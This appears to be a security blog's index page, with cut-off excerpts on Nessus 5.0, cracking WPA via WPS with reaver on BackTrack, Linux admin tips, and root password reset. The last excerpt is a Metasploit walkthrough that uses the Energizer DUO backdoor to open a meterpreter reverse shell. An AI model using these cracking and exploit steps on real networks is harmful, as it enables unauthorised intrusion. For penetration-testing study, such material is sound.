Posts

Nessus 5.0 Released

Image
Nessus  5.0 delivers introduces enhancements that streamline and optimize each of the major phases of the vulnerability and configuration assessment process. Specific benefits include: Streamlined startup – New installation wizard and web interface ensure  Nessus  5.0 is up-and-running, completely configured in minutes. Nessus  5.0 delivers introduces enhancements that streamline and optimize each of the major phases of the vulnerability and configuration assessment process. Specific benefits include: Streamlined startup – New installation wizard and web interface ensure  Nessus  5.0 is up-and-running, completely configured in minutes. Rapid policy creation – More than two dozen new plugin filters make it fast and easy to create policies for targeted scans. Selecting multiple filter criteria, such as, vulnerability publication date, public vulnerability database ID, information assurance vulnerability alert (IAVA), and more, makes it simple to identify easily-exploitable vulner

BackTrack - Cracking a WPA password with reaver

Wi-Fi Protected Setup (WPS) was introdused to allow home users with little or no knowelage of wirelss security to set up a wireless network encrypted with WPA or WPA2 as well as making it easy to add new devices to an existing network without entering long passwords/passphrases. In this example I will be using BackTrack 5 R1 Gnome 32 bit. You can either boot off the DVD or install it. The creating of a bootable DVD and installing BackTrack is beyond the scope of this tutorial.  I'm assuming you have two network connections one for internet access and one with your wireless adapter that we will be using in this test. In my case I'm using both a wired and wireless adapter. Open up a terminal and run the following commands apt-get update apt-get install reaver Next we need to find out what interface is assigned to your wireless card using the following command. iwconfig In my case wlan0 Next we need to put the wireless card in to monitor mode. airmon-ng star

Run Chrome as root in BackTrack 5

Download Chrome from the Google Chome site for the version you need. https://www.google.com/chrome/ In my case google-chrome-stable_current_i386.deb Install the Chrome version you downloaded which should be a .deb file using the command. Substitute for the version you downloaded dpkg -i  google-chrome-stable_current_i386.deb However when I launched Chrome I got the following error. Google Chrome can not be run as root   I edited the following file  /usr/bin/google-chrome  using your  favourite text editor in my case I typed the following   from a terminal. gedit /usr/bin/google-chrome Go to the very bottom of the text and add   --user-data-dir Make sure you put a space between the "$@"   and the --user-data-dir Last step is to Save and Quit the text editor Done.

Installing Libre Office in Backtrack 5R1

Below are two possible options for installing LibreOffice in Backtrack 5R1 Using the PPA installation of LibreOffice root@bt:~# add-apt-repository ppa:libreoffice/ppa root@bt:~# apt-get update root@bt:~# apt-get install libreoffice  Downloading the install package from the LibreOffice website and installing manually Download the main install package from the LibreOffice website ( http://www.libreoffice.org/download ) and if need your required language version to a temporary folder. In my case /root/Downloads Extract the main install file. In this example the install file. tar zxvf LibO_3.4.2_Linux_x86_install-deb_en-US.tar.gz Optionial extract your local language pack. In my case en-GB tar zxvf LibO_3.4.3_Linux_x86_langpack-deb_en-GB.tar.gz Install the main package root@bt:~# cd Downloads/LibO_3.4.2_Linux_x86_install-deb_en-US root@bt:~/Download/LibO_3.4.2_Linux_x86_install-deb_en-US# cd DEBS root@bt:~/Download/LibO_3.4.2_Linux_x86_install-deb_en-US/DEBS# sudo

Has UK gov lost the census to Lulzsec?

2011 UK census data apparently hacked.   http://t.co/GMjfD0N   I'll be keep an eye on   @ LulzSec   's Twitter feed for confirmation.

How To Reset A Forgotten root Password On A Linux Virtual Machine on XenServer

I recently had to carry out some maintenance on a Linux server hosted on our XenServer. However I had forgotten the root password. Lesson learned to save password in a secure location such as an encrypted usb stick or in an encrypted file on my cell phone. Anyway I digress, on the make it just work section. From Xencenter select the virtual machine you want to boot in single user mode. Shut down your virtual machine using the Xencenter controls. Right click on the Boot Options for your virtual machine and select Properties. Change the OS Boot Parameters to rw init=/bin/bash NOTE If you already have something in the OS Boot Parameters you will need to take note of this as you will need to put it back once the password reset is complete. Save and Start your virtual machine Your system will now boot up in single user mode. Now its time to change your password machinename# passwd root Type in your new password you will then be asked to confirm it. Your password has

How To Exploit the Energizer Trojan

As of release version 8749, you can now use Metasploit to locate infected systems on your local network using the following commands. # msfconsole msf > use auxiliary/scanner/backdoor/energizer_duo_detect msf auxiliary(energizer_duo_detect) > set RHOSTS 10.0.0.0/24 msf auxiliary(energizer_duo_detect) > set THREADS 256 msf auxiliary(energizer_duo_detect) > run [*] 10.0.0.23:7777 FOUND: [["F", "AUTOEXEC.BAT"] ....... To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module: msf > use exploit/windows/backdoor/energizer_duo_payload msf exploit(energizer_duo_payload) > set RHOST 10.0.0.23 msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(energizer_duo_payload) > set LHOST 10.0.0.253 msf exploit(energizer_duo_payload) > exploit [*] Started reverse handler on 10.0.0.23:4444 [*] Trying to upload C:\NTL0ZTL4DhVL.exe... [*] T